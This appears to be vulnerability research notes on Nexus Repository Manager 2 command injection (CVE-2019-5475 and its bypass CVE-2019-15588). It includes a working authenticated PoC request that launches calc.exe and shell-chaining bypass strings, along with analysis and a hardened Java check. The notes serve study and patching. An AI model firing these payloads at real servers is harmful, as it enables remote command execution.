Nexus 2 download:
https://download.sonatype.com/nexus/oss/nexus-2.14.13-01-bundle.zip
Or pick one from here:
https://help.sonatype.com/repomanager2/download/download-archives---repository-manager-oss
Note: do not download the Pro edition (it requires a license).
PoC:
PUT /nexus/service/siesta/capabilities/000013ea3743a556 HTTP/1.1
Host: HOST:PORT
Accept: application/json
Authorization: Basic YWRtaW46YWRtaW4xMjM=
Content-Type: application/xml
Content-Length: 333
Connection: close

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<ns2:capability xmlns:ns2="http://sonatype.org/xsd/nexus-capabilities-plugin/rest/1.0"><id>healthcheck</id><notes>123</notes><enabled>true</enabled><typeId>1</typeId><properties><key>createrepoPath</key><value>C:\Windows\System32\calc.exe</value></properties></ns2:capability>
Debugging reference:
https://blog.csdn.net/zhu19774279/article/details/8697633
Edit nexus-2.14.13-01/bin/jsw/conf/wrapper.conf and add the debug parameters to the file.
Uncomment this section:
Change the default port:
vi conf/nexus.properties
# application-port=8082
Note that Nexus 2 has a default context path, nexus, which Nexus 3 does not have.
Its log file is at sonatype-work/nexus/logs/nexus.log.
CVE-2019-15588
Source: https://hackerone.com/reports/688270
Bypass of the previous vulnerability:
/Applications/Calculator.app/Contents/MacOS/Calculator & /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator ; /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator | /createrepo
/Applications/Calculator.app/Contents/MacOS/Calculator || /createrepo
Note that the full path must be used.
Analysis
The key to this bypass is that the check does not look at the original payload string; it looks at File#getName of the File object that wraps it.
File#getName only returns the last part of the path:
Returns the name of the file or directory denoted by this abstract pathname. This is just the last name in the pathname's name sequence.
Reference: https://docs.oracle.com/javase/8/docs/api/java/io/File.html#getName--
In path traversal cases this method strips out ../ (see CVE-2019-3398).
Here, however, the same behaviour strips the front part of our payload for us, so the payload slips past the if check.
Execution then falls into the final else, where File#getAbsolutePath returns our payload unchanged.
Finally our payload is executed:
Summary
At first there was no filtering at all -> CVE-2019-5475
Then a getCleanCommand filter was added, but its filtering was not strict -> CVE-2019-15588
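To make the getName/getAbsolutePath mismatch concrete, here is an added Java example (not Nexus's code: the weak check is a hypothetical reconstruction of the behaviour described above, and /usr/bin/createrepo is a constructed placeholder path). It runs the four bypass strings and one benign path through a getName-based check and through a hardened check that allowlists characters, canonicalises the path and requires an exact match against the single permitted executable.

```java
import java.io.File;
import java.io.IOException;
import java.util.regex.Pattern;

public class CreaterepoPathCheck {
    // Expected executable name as in the post; the directory is a constructed placeholder.
    static final String EXPECTED_NAME = "createrepo";
    static final String EXPECTED_DIR = "/usr/bin";
    // Allowlist of path characters: no whitespace, no shell metacharacters such as & ; |
    static final Pattern SAFE = Pattern.compile("^[A-Za-z0-9_./-]+$");

    // Hypothetical reconstruction of the weak check: the decision is based on
    // File#getName (last path segment only), while the value handed back for
    // execution is File#getAbsolutePath (the untouched input).
    static String weakCleanCommand(String input) {
        File f = new File(input);
        if (EXPECTED_NAME.equals(f.getName())) {
            return f.getAbsolutePath();
        }
        return null; // rejected
    }

    // Hardened version: validate the whole string, canonicalise (resolving
    // symlinks and ".."), then compare against the one allowed executable.
    static String strictCleanCommand(String input) throws IOException {
        if (input == null || !SAFE.matcher(input).matches()) {
            return null; // rejects ' ', '&', ';', '|' and friends outright
        }
        File candidate = new File(input).getCanonicalFile();
        File allowed = new File(EXPECTED_DIR, EXPECTED_NAME).getCanonicalFile();
        return candidate.equals(allowed) ? candidate.getPath() : null;
    }

    public static void main(String[] args) throws IOException {
        String[] inputs = {
            "/usr/bin/createrepo", // benign
            "/Applications/Calculator.app/Contents/MacOS/Calculator & /createrepo",
            "/Applications/Calculator.app/Contents/MacOS/Calculator ; /createrepo",
            "/Applications/Calculator.app/Contents/MacOS/Calculator | /createrepo",
            "/Applications/Calculator.app/Contents/MacOS/Calculator || /createrepo",
        };
        for (String in : inputs) {
            // The weak check passes all five because getName() is "createrepo" for each;
            // the strict check passes only the benign path.
            System.out.printf("%-72s weak=%-6s strict=%s%n", in,
                weakCleanCommand(in) != null ? "PASS" : "reject",
                strictCleanCommand(in) != null ? "PASS" : "reject");
        }
    }
}
```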
Reference:
https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63#diff-4ab0523de106ac7a38808f0231fc8a23R84
A way to compare the releases online on GitHub:
https://github.com/sonatype/nexus-public/compare/release-2.14.14-01...release-2.14.15-01
Ref:
https://hackerone.com/reports/654888
https://issues.sonatype.org/browse/NEXUS-20626
https://support.sonatype.com/hc/en-us/articles/360033490774-CVE-2019-5475-Nexus-Repository-Manager-2-OS-Command-Injection-2019-08-09
https://github.com/sonatype/nexus-public/commit/7b9939e71693422d3e09adc3744fa2e9b3a62a63